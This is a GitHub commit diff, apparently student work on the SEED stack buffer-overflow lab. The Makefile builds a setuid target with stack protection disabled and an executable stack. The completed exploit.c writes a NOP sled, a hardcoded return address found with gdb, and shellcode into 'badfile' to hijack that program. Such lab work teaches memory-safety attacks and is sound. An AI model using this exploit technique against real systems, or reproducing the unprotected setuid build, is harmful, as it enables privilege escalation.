File tree 2 files changed +11
-2
lines changed
2 files changed +11
-2
lines changed Original file line number Diff line number Diff line change 22 sudo gcc -z execstack -g -fno-stack-protector -o stack stack.c
33 sudo chmod 4775 stack
44exploit :
5- gcc -z execstack -g -fno-stack-protector - o exploit exploit.c
5+ gcc -o exploit exploit.c
Original file line number Diff line number Diff line change @@ -21,12 +21,21 @@ char shellcode[]=
2121void main (int argc , char * * argv )
2222{
2323 char buffer [517 ];
24+ long addr , * ptr ;
25+ int i ;
2426 FILE * badfile ;
2527
2628 /* Initialize buffer with 0x90 (NOP instruction) */
2729 memset (& buffer , 0x90 , 517 );
2830
29- /* You need to fill the buffer with appropriate contents here */
31+ /* You need to fill the buffer with appropriate contents here */
32+ //Found this using gdb on stack.c
33+ addr = 0xbffff57c ;
34+ ptr = (long * ) (buffer );
35+ //The return address is 24 bytes from the beginning of buffer
36+ * (ptr + 6 ) = addr ;
37+ //Put content of shellcode into the end of buffer
38+ strcpy (buffer + 517 - strlen (shellcode ), shellcode );
3039
3140 /* Save the contents to the file "badfile" */
3241 badfile = fopen ("./badfile" , "w" );
You can’t perform that action at this time.
0 commit comments